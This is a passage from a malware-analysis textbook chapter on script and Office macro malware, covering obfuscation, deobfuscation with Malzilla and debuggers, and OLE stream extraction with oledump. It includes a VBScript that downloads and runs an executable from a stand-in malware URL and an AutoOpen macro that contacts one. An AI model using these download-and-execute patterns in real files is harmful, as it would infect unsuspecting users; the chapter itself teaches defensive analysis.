© Abhijit Mohanta, Anoop Saldanha 2020
A. Mohanta, A. SaldanhaMalware Analysis and Detection Engineeringhttps://doi.org/10.1007/978-1-4842-6193-4_20

20. Fileless, Macros, and Other Malware Trends

Abhijit Mohanta1  and Anoop Saldanha2
Independent Cybersecurity Consultant, Bhubaneswar, Odisha, India
Independent Cybersecurity Consultant, Mangalore, Karnataka, India

So far in the book, we spoke about and analyzed malware, which is binary executables. But malware can also be delivered in other file formats as well, and this has turned into a common delivery technique used by attackers these days. Attackers even take it one step further by delivering and executing the contents of nonexecutable malware all in memory, without even writing it to the disk as a file, also known as fileless malware.

Generally, malware is usually in the form of scripts. JavaScript, VBScript, and PowerShell scripts are some of the common scripting languages for creating malicious scripts. These malicious scripts can also be embedded as a part of other files like HTML, Microsoft Office Word documents and Excel sheets, PDF documents, and so forth. Both scripts and these other document files which have embedded malicious scripts within them are commonly used formats for creating malware. This malware is used as an attack vector in phishing emails to deliver them to unsuspecting victims who don’t suspect the attachments to be malicious just because they are nonexecutables.

In this chapter, we look at scripting based malware that is commonly used these days. We also go into the details of dissecting Microsoft Word and Office documents based malware, exploring various static and dynamic techniques to debug them.

Windows Scripting Environment

Almost all operating systems natively have support for scripting languages. These very same languages are utilized by malware authors who write malicious scripts in these scripting languages to deploy their malware.

Some scripting languages allow the script programs/files to be compiled into an intermediate binary representation that can then be executed by their VMs (different from hypervisor virtual machines). In other cases, scripts can even be compiled into binary executables. But the most common way to use and distribute scripting programs is their raw source textual human-readable form, which is what we are going to concern ourselves in this chapter.

Whatever language you write your script in, it requires another interpreter that can understand the contents of the script and execute it. By default, Windows has a scripting environment called Windows scripting host (WSH), which has interpreters that support the execution of JavaScript script files with .js extension and VBScript script files with .vbs extension among others. Later versions of Windows provided a new scripting language called PowerShell, which was meant to be used by users to automate administrative tasks in an enterprise environment.

Most scripts based malware that is targeted for windows is written in VBScript, JavaScript, and PowerShell.

These scripts need not always have to be part of standalone script programs to be run. Instead, they can also be a part of or rather embedded in other files like HTML, Office Documents, and PDF files. The scripts embedded in these files are run when the outer file that contains these scripts are run. For example, consider an HTML file that contains a script written in JavaScript. This JavaScript runs when this HTML file is loaded by browsers like Firefox, Chrome, and Internet Explorer. The JavaScript inside the HTML files is executed by the JavaScript interpreter embedded in these browsers. For example, Firefox uses the SpiderMonkey open source JavaScript engine/interpreter to run JavaScript present in HTML files.

Similarly, Office documents like MS doc and Excel files require Microsoft Office to be installed on the system to open them. These files can have VBA (Visual Basic for Applications) scripts embedded in them, which are also called macros. Microsoft Office software has a VBA interpreter embedded in it to execute the VBA scripts in these docs and Excel files when they are opened.

As mentioned earlier, scripts are passed around in human-readable source code format, so the contained code is visible in plain sight for analysis, unlike compiled programs. To counter this, malware use obfuscation techniques to make it unreadable, to hide the actual content and intention of the code. In the next section, let’s explore some of the obfuscation techniques commonly used by malware.


Obfuscation is a process meant to hide both the actual content and intent of the program in the script files. These days there are a lot of readily available obfuscators that can turn a plain script code into an unreadable/obfuscated one. Most obfuscators work by treating the entire source code or parts of the code as strings that can be stored across multiple variables in the final generated obfuscated file. The obfuscators break the script code, add some other code along with it, encode parts of it to make it unreadable. Finally, they make sure the logic remains intact at the time of execution. It means the output of the code is not altered as a result of the obfuscation even though the look and feel of the code have changed entirely.

Before we explore some of the simple obfuscation techniques used by malware authors, let’s look at Malzilla, a popular tool which we use to analyze JavaScript code. Malzilla is a popular malware analysis tool specifically built to deobfuscate JavaScript malware, which uses the SpiderMonkey JavaScript engine for executing JavaScript code.

Let’s start with a simple JavaScript code seen in Listing 20-1 and analyze it using Malzilla.
document.write("Hello World!");
Listing 20-1

Hello World Plain JavaScript

In Figure 20-1, we executed the code from Listing 20-1 in Malzilla. To execute a piece of JavaScript code in Malzilla, you need to switch to the Decode tab and paste the code in it. Then you can execute the code by pressing the Run Script button. The output of the code is shown in the output window.
Figure 20-1

Malzilla used to analyze a simple JavaScript code

In the next set of sections, we take the same simple one-liner piece of code from Listing 20-1 and obfuscate it into multiple forms using various techniques. We urge you to execute the obfuscated versions of the code in Malzilla and compare the output with the original code, which should be the same as the output from Figure 20-1.

Hex Equivalents

Characters can be represented with their equivalent hex encoding as well, which is frequently used to obfuscate programs. Listing 20-2 shows the obfuscated form of the same code we saw earlier in Listing 20-1, which now uses hexadecimal encoded equivalents for the Hello World string.
Listing 20-2

Obfuscation Using Hex Equivalent for the Code in Listing 20-1

During analysis, while dealing with hexadecimal encoded code, you need to convert them into their ASCII equivalent (or any other encoding for that matter) to understand the code. For conversion, you can use any of the online tools or even Malzilla, as we have done in Figure 20-2.
Figure 20-2

Malzilla used to decode the hexadecimal bytes to its string ascii equivalent

Splits and Joins

A technique frequently used by obfuscators is to take a single piece of string, break it up and scatter the pieces across various lines in the finally generated obfuscated code, thus making it harder to analyze. For example, Listing 20-3 is the equivalent obfuscated code for the one in Listing 20-1, that uses this technique.
var str1= "He";
var str2 =" World!";
var str3 = "llo";
document.write(str1 + str3 + str2);
Listing 20-3

Equivalent Obfuscated Code for One from Listing 20-1 That Uses Split Strings

The obfuscator has split the string Hello World! into three strings and stored them into the str1, str2, and str3 variables. If you observe the last line of code, the parameter of document.write combines using the + operator these three variables, which hold the three splits, thereby reconstructing the original string Hello World!

Listing 20-4 shows another example of this obfuscation technique for the code in Listing 20-1.
var xyz=["He","llo","or"," W","ld!"];
document.write(xyz[0] + xyz[1] + xyz[3] + xyz[2] + xyz[4]);
Listing 20-4

Equivalent Obfuscated Code for One from Listing 20-1 That Uses Split Strings

Inserting Junk

Obfuscators often insert both junk code and data among the real script code and data to obfuscate the code. While executing the obfuscated code, the junk code inserted works like the NOP instruction, where running them has no change in state or output of the program. In contrast, the junk data that has been interspersed among the real script data is cleaned/removed to extract the real data before using it.

Listing 20-5 is another obfuscated equivalent for the code in Listing 20-1 that uses this obfuscation technique.
var str = "HexyAlloxyAxyA WxyAorxyAldxyA!xyA" ;
const regex = /xyA/gi;
var repl = str.replace(regex,'');
Listing 20-5

Equivalent Obfuscated Code for One from Listing 20-1 That Uses Junk Code/Data

If you see the code, the junk string xyA has been inserted at random places inside the Hello World! string to generate the final junk string held in variable string HexyAlloxyAxyA WxyAorxyAldxyA!xyA. The code, when executed, cleans up the junk from this variable str using the replace() function. It reconstructs the original string into the new variable rep1, before it is reused as a parameter to the document.write function.

Let’s look at Listing 20-6, another piece of obfuscated code where junk is removed using split and join functions instead of the replace function in the previous listing.
var str = "HexyAlloxyAxyA WxyAorxyAldxyA!xyA" ;
var str = str.split("xyA").join('');
Listing 20-6

Equivalent Obfuscated Code for One from Listing 20-1 That Uses Junk Code/Data in Combination with split() and join() APIs

This code also uses the same string with junk inserted as in the previous example, but here the junk string is split into substrings by using xyA as a delimiter. The substrings generated are then joined/concatenated together using the join() function to generate the original string.

Expression Evaluation with eval

Another commonly used function in obfuscated functions is the evaluation functions like eval, which are mostly used to evaluate expressions. In one way, you can say that eval can execute a piece of code that is passed to it as a parameter.

For example, so far, we only saw the use of variables containing string data that was tampered with or obfuscated. With eval we take it further where even the document.write function call can be stringified and supplied as a string to the eval function, which then executes it. This lets us obfuscate the full script, including the various function calls by using various techniques we discussed in the previous section.

Listing 20-7 is another obfuscated equivalent for the code in Listing 20-1 that uses this obfuscation technique.
str1 = 'document';
str2 = '.write';
str3 = "('Hello World!');";
eval(str1 + str2 + str3);
Listing 20-7

Equivalent Obfuscated Code for One from Listing 20-1 That Uses eval() Function

In the listing, you see that even the document.write() function call from Listing 20-1 is stringified and split into multiple strings, and then reassembled back into original form when it is passed as parameter to eval which then execute it.

While deobfuscating and analyzing malware scripts, eval() functions are a good point to investigate. The parameter passed into an eval function is likely to contain the final deobfuscated code.

If you are using Malzilla to analyze the code, it opens an eval window whenever it encounters an eval() during execution, as seen in Figure 20-3, which is running the script code from Listing 20-7.
Figure 20-3

Eval window in Malzilla shows an eval it encounters while running the code from Listing 20-7

If you double-click the eval results in the eval window, you can see in the output window the expression or the parameter passed to the eval function. In this case, it is our original de-obfuscated JavaScript code document.write("Hello World!");.

Encryption Algorithms

Obfuscators may use encryption algorithms to encrypt the code into a nonreadable format. One of the most common encoding schemes used for obfuscation is base64 encoding. For example ZG9jdW1lbnQud3JpdGUoIkhlbGxvIFdvcmxkISIpOw== is the base64 encoded string of document.write("Hello World!");. Most of the Base64 encoded strings end with = if it ends up using padding or one of the characters in the set [A-Z, a-z, 0-9, and + /], which makes it easy to identify in a set of characters. If you encounter such a string, you can use a base64 decoder to decode it.

There can be numerous obfuscation techniques used by obfuscators, of which we have covered some of the commonly used ones. In our next section, let’s explore some ways to deobfuscate these obfuscated scripts.


Before deobfuscating a code, we need to understand some basics of the scripting language in which the code is written. It’s not necessary to understand all of it. You should understand how variables are declared, how they are assigned values, and so forth. In JavaScript, the var construct declares a variable while in VBScript, the Dim construct is used to do the same. Other constructs like for, while, if, else are the common keywords in almost all the programming languages.

Since most obfuscation techniques, especially ones that use eval(), treat the script code as a string and play around it, you should be aware of the commonly used functions and operators that are involved in string operations, with Table 20-1 listing some of the JavaScript ones.
Table 20-1

Commonly Used JavaScript Keywords and Functions




Evaluates an expression


Replaces the occurrence of a substring in a string


Splits strings using delimiter


Joins two strings with a delimiters


Converts unicode values to characters


String concatenation


String concatenation


Writes to HTML document


Writes to the browser console

When you are dealing with obfuscated scripts in other languages, you need to find the relevant keywords and functions in that language as well.

In the next set of sections, let’s explore some of the deobfuscation techniques that we can use.

Static Deobfuscation

Static deobfuscation employs manually assessing the code either by directly reading the code and understanding its constructs or using the aid of other static deobfuscation tools to better format the code and make the process easier and all of it without executing the script code. Again the basics of the programming language are required to understand the code.

Let’s again analyze the code in Listing 20-5. This code has the str string variable, which contains the original string with junk characters xyA interspersed with it. Now in the next lines, it replaces the junk characters with a void '' character using the Replace function. We can also do the same manually in Notepad. We can replace the string in Notepad using the Find and Replace function, which we can access using the keyboard shortcut Ctrl+H key, as seen in Figure 20-4.
Figure 20-4

Using the Find and Replace function in Notepad to statically deobfuscate the code in Listing 20-5

This kind of process may be time consuming. Also, most malware’s obfuscated script code does not look as simple as the one in Listing 20-5. Actual malware obfuscated code is usually long and complex, and in a lot of cases, one single line can contain the entire script code.

In our samples repo, we have Sample-20-1.txt, which contains instructions on how to download malware JavaScript code. You can download this malicious JavaScript code and save it to Sample-20-1.txt (replace the original Sample-20-1.txt, which contains the download instructions to Sample-20-1-instructions.txt). If you open this file, you see obfuscated malware script code, as seen in Figure 20-5.
Figure 20-5

Obfuscated malware JavaScript in Sample-20-1

Do you think you can manually analyze this code by reading it? Maybe parts of it, but not the whole script. Not unless you are Neo from The Matrix.

But we can also better format such code to make it more reader-friendly using tools like Malzilla. Paste the code from this script file into Malzilla, but do not run it. Instead, click the Format code button, as seen in Figure 20-6.
Figure 20-6

Format code option in Malzilla used to format and make code more readable

As seen, Malzilla analyzes the code and formats it into a more readable multiple-line format from the single line it previously used. But with static analysis and manual reading of the script code to understand its intent, it can only take us so far when it comes to figuring out the malware. It’s better to investigate these kinds of codes by debugging or executing them, as you see in the next section.

Dynamic Deobfuscation

Dynamic deobfuscation requires execution of the code, and Malzilla is a nice tool to start with this process. Let’s paste the script code from Sample-20-1.txt into the decoder window of the Malzilla and then run it using the Run script button. Like we earlier saw in Figure 20-3, it opens an eval() results window, listing the eval function calls seen in the code. If you double-click these results like you did with Figure 20-3, and you can view the decoded script code contents passed as parameters to this eval as seen in Figure 20-7.
Figure 20-7

Decoded eval() contents from the execution of Sample-20-1 using Malzilla

This code passed to eval code is again slightly obfuscated but enough to conclude out of it. It has some suspicious domain names in it. If you Google these domain names, you find that they are related to malicious sites, allowing you to conclude that the sample script is malicious.

Let’s try another to deobfuscate another JavaScript code with Malzilla. Sample-20-2.html in our samples repo is an HTML file that contains JavaScript code, as seen in Listing 20-8.
<input type="text" id="obfus" name="obfus" value="HexyAlloxyAxyA WxyAorxyAldxyA!xyA"/><br/>
var str = document.getElementById("obfus").value;
var repl= str.split("xyA").join('');
Listing 20-8

HTML Code with JavaScript Code from Sample-20-2.html in Our Samples Repo

If you open Sample-20-2.html in a text file and extract the JavaScript code contained with <script> and </script> tags as seen in the listing and paste and try running it in malzilla, it fail and show a compilation error. Why does this happen?

This is because browsers support the getElementById function in the JavaScript code, and Malzilla does not support it. In the code, the obfuscated string is stored in an element with the obfus ID inside an element in the HTML page. The JavaScript fetches the obfuscated code by using getElementById and then deobfuscates the contents. The obfus element forms a part of the Document Object Model (DOM) structure of the HTML page, which can be accessed if the JavaScript code is executed from inside a browser. But since Malzilla is a standalone JavaScript engine, it cannot access the element by any means, and thus throws an error.

JavaScript malware scripts need not always be shipped by an attacker as a standalone script. Malicious JavaScript can be embedded in documents like HTML and PDF. Some HTML files contain JavaScript code that may only run in one particular type of browser. JavaScript can be part of PDF files that can be executed in Foxit, Adobe PDF Readers. Again JavaScript script code embedded in PDF files may also be targeted to run in specific programs like Foxit or Adobe PDF Reader. Malicious JavaScript may also contain exploit code, which is software specific and even version-specific, that are meant to exploit a vulnerability in specifically targeted PDF Reader software programs.

Embedded Script Debuggers

HTML pages can be opened in the browser, and the JavaScript in it can be debugged using the JavaScript debugger in the browser. This is much more helpful in scripts that contain JavaScript functions that are not supported by Malzilla. Let’s debug the code with the JavaScript debugger of Internet Explorer. Table 20-2 lists some of the keyboard shortcuts that are helpful when debugging the JavaScript code using Internet Explorer.
Table 20-2

JavaScript Debugger Keyboard Shortcuts for Internet Explorer

Debugger functionality

Keyboard shortcut

Step into




Set Breakpoint




Now open Sample-20-2.html in Internet Explorer. You need to allow JavaScript to execute in your browser to perform the analysis. With the HTML file loaded, you can then launch developer tools by pressing the keyboard shortcut F12, which should open up the Developer Tools window, as seen in Figure 20-8. You can switch to the script tab, which is the JavaScript debugger interface.
Figure 20-8

JavaScript Debugger of Internet Explorer and the breakpoint we have set

Before starting the debugger, you need to set a breakpoint. You can set a breakpoint by going to the specific line in the JavaScript code and pressing the F9 keyboard shortcut, as seen in Figure 20-8.

If you look at the code statically, the repl variable should hold the deobfuscated string when the execution has reached line 10. So we can set a breakpoint at line 10. After setting the breakpoints at appropriate places, you need to refresh the web page for the debugger to start. Internet Explorer prompts you to refresh the page, but other browsers might not, after which you can press the F5 key to execute the code. Now when our breakpoint is hit, you can go to the command window and type in the console.log(repl); command as seen in Figure 20-9, which logs the value of the repl variable in the console window.
Figure 20-9

The command to see the content of the variable

Now, if you press the Run Script button, you see the content of the repl variable in the console window, as shown in Figure 20-10.
Figure 20-10

Value of repl in console window from the print code we added in Figure 20-9

Alternatively, you can also set watches on these variables, which monitors and displays the real-time value of these variables as you run through the code. There is a good probability that some of the variables have to contain the decrypted data. Finding variables names is quite easy as variables are declared with the var keyword. To create a watch on a variable, you need to right-click the variable name, and then select the Add Watch option as seen in Figure 20-11, which then pops up in the Watch window.
Figure 20-11

Add watch to a variable

The watch window displays the list of variables on which the watch has been set. If the code is highly obfuscated, you can keep an eye on the variables in the Watch window. The data stored in these variables alter as we step through the code in the debugger, and at some point in time, they may contain deobfuscated code.

While deobfuscating script-based malware, debugging is one of the best methods to analyze them. JavaScript embedded in HTML pages can be debugged using the JavaScript debugger in the browsers. Similarly, VBA Scripts embedded in Word documents can be debugged using the Visual Basic Debugger present in Microsoft Office, as you will see in the next section. Similarly, PowerShell scripts can be debugged in PowerShell ISE.

All kinds of script debuggers, whether it is a JavaScript debugger in Chrome or Firefox or a Visual Basic Debugger in Microsoft Word, all have got features of code stepping, setting breakpoints, adding watches and so forth. The debugging techniques we applied to deobfuscate the JavaScript can also be utilized to deobfuscate other script-based malware as well.

The Payload

Most of the time, scripting malware is used as downloaders/droppers, which download other malware/payloads like ransomware, banking trojans, and so forth and then execute them on the victim machine. These malicious scripts can also present in compound documents like PDF and Word documents. These documents can also contain malicious executables embedded inside along with the malicious scripts. The embedded scripts are responsible for downloading or extracting this malware and dropping them to the file system and executing them. These kinds of malicious malware fall into the category of droppers. Another kind of payload in the script-based malware can exploit that takes advantage of some vulnerability in the software that loads the scripts.

Downloaders and Droppers

For downloading and dropping capability, the scripts can take the help of the Windows Component Object Model (COM) objects. To simplify COM, you can consider these as Classes that have member variables and functions. We can create objects from these classes and call their methods/functions to avail of various functionalities provided by them.

There can be multiple COM objects for various functionalities, including ones that allow you to access the Internet using an HTTP protocol, interact with the file system, the registry, and so forth. Since we are mostly dealing with downloaders and droppers in this chapter, we look at those COM objects that can help to achieve the mentioned functionalities.

MSXML2.ServerXMLHTTP is one of the most important classes that implement various functionalities of the HTTP protocol. This class is used by malware for implementing the download functionality. Here are some important methods of the class. Table 20-3 lists some of its important methods and their functionality.
Table 20-3

Methods Implemented in MSXML2.ServerXMLHTTP and Their Functionality




define HTTP request


send HTTP request


contains HTTP Response

Another important class is the ADODB.Stream, which is used for storing and manipulating data streams. Table 20-4 lists some of its important methods and their functionality.
Table 20-4

Methods Implemented in ADODB.Stream and Their Functionality




Opens a stream


Writes data to the stream


Saves stream to a file


Closes the stream

Another important class is WScript.Shell. The class implements methods that can allow it to directly execute operating system commands. Table 20-5 lists some of its important methods and their functionality.
Table 20-5

Methods Implemented in WScript.Shell and Their Functionality




Executes OS command as a new process


Executes OS command but as a child process


Writes key or value to register


Reads key or value to register


Deletes key or value to register

The script-based malware written in Visual Basic and JavaScript uses these COM objects to achieve their various functionalities, including downloading additional malware payloads, writing them to files on the disk, and then executing them. While analyzing malicious scripts in the final deobfuscated code, you are likely to see these COM objects plus other similar ones being instantiated and their methods being invoked to achieve various tasks.


Various malware that comes in the form of Microsoft Office documents, or PDF files or HTML files might contain exploits targeted for browsers, Microsoft Office document readers or PDF readers. Exploits are pieces of code that take advantage of a vulnerability in the software. A vulnerability is a kind of bug that can compromise software and then the system on which the software is running. Vulnerabilities are exploited/triggered by providing a specially crafted input to the target software. For example, HTML documents can serve as input to browsers like Chrome and Firefox and so forth, while a Word document can serve as an input for Microsoft Office apps.

Coming back to exploits, an exploit contains a very small piece of code called shellcode, which is executed only if the exploit is successful in taking over the software using the vulnerability. The shellcodes are nothing but small pieces of code passed in its raw binary format, that can carry out malicious functionalities like opening a backdoor port or downloading another piece of malware. Figure 20-12 shows an image of a piece of shellcode.
Figure 20-12

Sample shellcode

Exploitation and vulnerability is a vast subject in itself and is beyond the coverage of the book. If you want to find out how an exploit looks like, you can browse through exploit-db.com.

VBScript Malware

Windows Scripting environment, by default, supports Visual Basic Scripting, which is exploited by attackers who send malicious script files in phishing emails that carry the .vbs. Similar to the standalone Visual Basic environment, Visual Basic for Applications (VBA) is a derivative of Visual Basic, similar in syntax, and writes scripting code that is embedded into Microsoft Office applications. Attackers can also embed malicious VB scripts written using VBA into these Microsoft Office documents to create malicious Microsoft Document files.

Table 20-6 lists some of the basic keywords that you encounter while analyzing VB scripts.
Table 20-6

Some of the Basic Keywords Available in Visual Basic Language




Initializes a variable


Sets data type during variable declaration


Assigns object to a variable


If condition start


Code after this executed if the condition is satisfied


else condition


End of If block

Sub <subroutine name>

Start of subroutine

End Sub

End of subroutine

Function <Function Name>

Start of a function

End Function

End of Function

While browsing through visual basic programs, you encounter two kinds of procedures or functions, called subroutines and functions. Both are quite similar. But the basic difference is that subroutines do not return anything while Functions do. A function starts with a Function keyword and ends with an End Function keyword.

As we told earlier, most of the scripting based malware download and execute other malware on the system. Listing 20-9 shows a Visual Basic program that downloads and executes malware hosted on a malware URL site.
'variable declaration and assignment
Dim URL As String
Dim HttpReq As Object
Dim Stream As Object
Dim Shell
URL = "hxxp://malwareUrl/malware.exe" 'malware URL
downloadPath="C\virus.exe" 'local path of downloaded file
Set HttpReq = CreateObject("MSXML2.ServerXMLHTTP")
HttpReq.open "GET",URL, False
'initialize the stream object
Set Stream = CreateObject("ADODB.Stream")
'save response to stream
Stream.Write HttpReq.ResponseBody
'Save the stream to file C: estmalware.exe
Stream.SaveToFile "C\virus.exe", 2
set Shell = CreateObject("WScript.Shell")
Shell.run downloadPath
Listing 20-9

Sample Visual Basic Code That Downloads and Executes Malware

The code uses the COM objects MSXML2.ServerXMLHTTP, ADODB.Stream and WScript.Shell, which we spoke about earlier to access the malicious URL, download the malware hosted on it and execute it. You encounter very similar codes in VBScript and VBA malware. But the code won’t be in a plain format as seen in the code listing and is most often obfuscated. We need to deobfuscate it to dissect the actual code and figure out its intention. We explain VBA deobfuscation in malicious Microsoft Office documents in the next section.

Microsoft Office Malware

Office documents like Word, PowerPoint, Excel sheets have been constantly used by attackers to carry out phishing attacks via email. In a lot of phishing attacks, these malicious documents contain hyperlinks that redirect to malicious websites when the victim clicks on it. Attackers frequently use these kinds of documents to deliver malware because users tend to have the perception that if it is not an executable, it may not be malicious. Combined with the fact that most users use these kinds of documents to store their data, it makes an attractive option for attackers to use.

In this section, we look at more stealthy and more complex forms of attack using documents where malicious executables and scripts are deeply embedded into the file format of these Microsoft Office documents.

When dealing with Microsoft Office malware, you usually see three types of file extensions for these document files: .doc, .docx, .rtf. Similarly, for PowerPoint files, you see .ppt and .pptx, and for Excel files, you see .xls and .xlsx. All Microsoft Office versions support the file formats for the .doc, .ppt and .xls file extensions while .docx, .pptx, and .xlsx are supported by Microsoft Office 2007 onward. To understand attacks based on these Office documents, we need to look at the OLE file format, which is the file format used by Microsoft Office documents.

OLE File Format

Object Linking and Embedding (OLE) is a file format developed by Microsoft that allows other kinds of files like executables, media files, hyperlinks, and scripts to be embedded into these documents that use the OLE file format, and Microsoft Office documents follow the OLE file format.

The magic header in the OLE file format starts with magic bytes D0 CF 11 E0. If you look at the bytes, it means DOCFILE. The .docx, .pptx and .xlsx files follow an XML-based file format, where contents are in a ZIP file. Figure 20-13 shows the magic byte of a .doc file in a hex editor.
Figure 20-13

Magic byte of .doc, .ppt and .xls files as seen in Notepad++ Hex Editor

OLE is a compound file format that can accommodate other files in it, just like a file system. OLE file formats can accommodate media files, text files, macros (scripts), embedded executables, and so forth.

As malware analysts, we are more concerned about embedded macros and embedded executables, since malware attackers use them to ship around malicious documents. Macros are script codes that are meant for automating certain tasks within a document. We look at macros with some more details later.

Like we said earlier, the OLE file format is like a file system, where various kinds of objects can be stored within it in a structured manner. It has storages that are equivalent to directories on a file system and streams, which are equivalent to files on file systems. Just like directories can have subdirectories and files under them, the storage in OLE files can have more storage and streams under them. Media files, macro codes, binary executables are stored inside streams. The storage can have names that can give an idea about the contents of the storage.

The following are some of the storage found is an OLE file.
  • Macro: Contains macro Codes

  • ObjectPool: Contains objects which can include media, embedded executables.

  • MsoDataStore: Stores the metadata of information about other contents

From the point of view of malware analysis, Macros and ObjectPool are the important ones. The first one is likely to contain malicious macro scripting code while the second one can have embedded malicious executables. In the next section, let’s explore the OLE file format with the help of some tools.

Dissecting the OLE Format

Several tools can parse the OLE file format. Some of the tools have a nice user interface, but some are just having a command line. Two such popular tools are Oletools and OleDump.py from Didier Stevens

Let’s look at the OLE file format using the DocFileViewer tool. As an exercise, open the text file Sample-20-3.txt from the sample repo, which contains instructions to download the actual malware Office .doc file, which you can download and then rename as Sample-20-3.doc. Using DocFileViewer, open this sample file using File open from the menu bar. As seen in Figure 20-14, the tool displays the OLE file format structure of this sample doc file. We have marked the various storage and the streams contained within them and the contents of these streams.
Figure 20-14

DocFileViewer tool displaying the OLE format

The stream named Ole10Native contains embedded data in it, which seems to be a PE executable file as identified by the MZ magic bytes.

Let’s inspect the same file using oldedump.py tool, which is a Python script that displays information about a .doc file’s OLE structure. Run the command line seen in Figure 20-15 to dump the OLE structure of Sample-20-3.doc.
Figure 20-15

oledump.py tool to view OLE file format of Sample-20-3.doc

The output from oledump.py displays the streams in various storage of the .doc file. The tool has numbered the streams from 1 to 17. The storage name ends with / just like we see for a directory in a file system. If you notice in the figure, some of the storage objects are Macros, Macros/VBA, OleObjectPool, MsoDataStore, all of which are followed by a /. The second column displays the kind of stream where M represents a macro while O represents an embedded object. You can match the names of the storages and streams seen from the output with the output we saw from the UI of DocFileViewer. In the next section, we are going to extract and analyze these streams.

Extracting Streams

Streams can be extracted using the DocFileViewer tool. But some of the streams, especially the macro streams, can be compressed. Oledump.py is a better option to extract streams as it has the option to decompress the streams as well.

To dump a stream using oledump.py, you can use the command oledump.py -s Stream_Number -[d|v] <File_Path>.The -s option specify the number of the stream as displayed by the oledump.py output seen earlier in FIgure 20-14. <File_Path> is the path of the Microsoft Office file you want to analyze. The second option can specify how we want the stream to be processed while being dumped. If you use the -d option, it instructs oledump.py to dump the raw contents of the stream. This is useful when you are dumping a stream containing an embedded executable. If it is a macro stream that you want to extract, you can use the -v option, which can dump the decompressed macro script code.

As we saw in the oldedump.py output for Sample-20-3.doc in Figure 20-14 and DocFileViewer tool as well in Figure 20-13, it contains a stream, Ole10Native, which holds an embedded PE executable. oledump.py has numbered this stream with number 14. Let’s dump this stream using oledump.py. You can redirect the output, which contains the stream contents to a file using the redirection operator >> at the end of the command. Run the command oledump.py -s 14 -d Sample-20-3.doc >> dumpfile, which dumps the contents of the stream 14 to a file named dumpfile. You can now further analyze the contents of dumpfile using a hex editor of your choice.

We have opened dumpfile using the Notepad++ hex editor, and we can see the PE executable on it identified using the MZ magic bytes, as seen in Figure 20-16.
Figure 20-16

Contents of stream 14 of Sample-20-3.doc extracted into dumpfile using oledump

The dumped stream has an MZ executable in it, but there are some other contents at the start of the dump. You can remove the contents before the MZ header in your hex editor to get the executable. Now your .exe is ready for analysis. You can now carry out both static and dynamic analysis of the extracted embedded PE executable file. We uploaded the extracted sample to virustotal to see how many antiviruses are detecting it, as seen in Figure 20-17.
Figure 20-17

Virustotal screenshot for the embedded PE executable file we extracted

So, 46 out of 69 anti-malware programs are detecting the file at the time we uploaded it. This is a good indication of maliciousness.

In the next section, let’s look at macro streams and how to extract and analyze them from Office OLE files. But first, let’s try to understand some of the basics of macro programming.


Macros are scripts that are meant for automating tasks in Microsoft Word, Excel, and PowerPoint files, and are embedded inside the OLE file format in these files. Macros are mostly written in programming languages like VBA. Malicious threat actors embed malicious macros into these Office document files, turning them malicious. When unsuspecting victims open these malicious documents on their system using Microsoft Office Suite of tools like Microsoft Word, Excel, and PowerPoint, the Office tool executes this embedded malicious macro in these Office files, thereby infecting the system.

We already talked about some basics of Visual Basic Scripting. As we mentioned earlier, VBA scripts are also similar to VB Scripts. But since VBA is specially meant to be executed within the Office documents, there are certain extra features in it related to Microsoft Office documents. One of the special features is the automatic subroutines, which is exploited by malware writers to write malicious macros, which we discuss next.

Automatic Macros

We already talked about subroutines and functions in VB scripting. The so-called automatic macros are subroutines but with predefined names. These subroutines, if present in the macro code, are triggered by very simple events like opening and closing a document. Table 20-7 lists some of these predefined automatic subroutines available in the Office environment.
Table 20-7

Some of the Auto Subroutines Present in the Office VBA Environment That Can Be Used by Macros

Subroutine Name

Triggering Event


When Word is started


When new document is created


When existing document is opened


When document is closed


When you exit a Word document

Apart from the ones mentioned in the table, there are a few other automatic subroutines like Document_New(), Document_Close(), Document_New() that are also triggered automatically on certain events in Office documents when opened. If while writing a macro code, you write a subroutine with one of the names mentioned, the code inside it is going to be executed on the occurrence of the mentioned event. If malicious code is placed inside a subroutine named AutoOpen, the code in it is going to get executed when the document is opened. Listing 20-10 shows the implementation of the AutoOpen() subroutine, which sends an HTTP request to a malwareURL.com when the document is opened.
Sub AutoOpen()
      Dim URL As String
      Dim HttpReq As Object
      URL = "hxxp://malwareUrl.com"
      Set HttpReq = CreateObject("MSXML2.ServerXMLHTTP")
      HttpReq.open "GET",URL, False
End Sub
Listing 20-10

Example Macro with AutoOpen Subroutine That Places a HTTP Request on Document Open

Now that you know the basics of VBA macros, let’s learn how to extract and analyze them. We again use the Oledump tool for the same.

Macro Extraction

As an exercise, open the text file Sample-20-4.txt from the samples repo, which contains instructions to download the actual malware Office .doc file, which you can download and then rename as Sample-20-4.doc. Let’s look at the OLE structure using oledumpy.py for this document file, as we did in the previous section.

In the output of oledump.py in Figure 20-18, obtained by running the command oledump.py Sample-20-4.doc, the document file has a macro in stream 7, as indicated by the letter M.
Figure 20-18

OLE structure for Sample-20-4.doc as seen with the help oledump.py tool

Let’s extract the stream with the oldedump.py -v option. Run the command oledump.py -s 7 -v Sample-20-4.doc >> dumpfile to dump the decompressed macro contents into dumpfile. Open the contents of dumpfile to view the contents of the macros, a part of which we have displayed in Figure 20-19.
Figure 20-19

Macro in stream 7 on Sample-20-4.doc extracted using oledump.py tool

As you can see in the screenshot, which you can also check in the dumpfile file output that contains the same macro code, the macro script code has defined a Document_Open() automatic subroutine, which is triggered when the document is opened. The subroutine calls another JTCKC() function. If you look at the code of the Document_Open()subroutine, it invokes the JTCKC() function several times.

From visually analyzing this macro code, it is hard to figure out the variable names since they have very randomized and long names, which is a clear sign of obfuscation. It is still possible to manually read the code and figure out its meaning and intent, but it can be time-consuming. But if we debug the code, it is much easier to de-obfuscate it as well and understand its functionality. To dynamically debug this macro, we can use the built-in Visual Basic debugger provided by Microsoft Word Office tool, as you see in the next section.

Macro Deobfuscation Using Debugging

To dynamically debug a macro present in a .doc file, you can open the file using Microsoft Word to use its Visual Basic Debugger. You can now open Sample-20-4.doc in Microsoft Word, and it starts by giving you a warning regarding the presence of macros in the document and seeks your permission for enabling macro, as seen in Figure 20-20. This is a security feature provided by Microsoft Office tools to prevent automatically running macros in Office documents, since malware are shipped widely these days by attackers containing malicious macros.
Figure 20-20

Macros need to be manually enabled while opening Office document files

You should choose the Enable Content option in the pop up, as seen in the figure to enable macros. To launch the VBA debugger use the key combination of Alt+F11, which pops up a user interface similar to the one seen in Figure 20-21.
Figure 20-21

VBA debugger in Microsoft Word opened with the keyboard shortcut Alt+F11

The left side of the window is the project window, which can display the files used in the VBA project. The right-hand window is the debugger window, which we use to debug the VBA macros.

Table 20-8 has listed some keyboard shortcuts that can debug the VBA macro code in the debugger.
Table 20-8

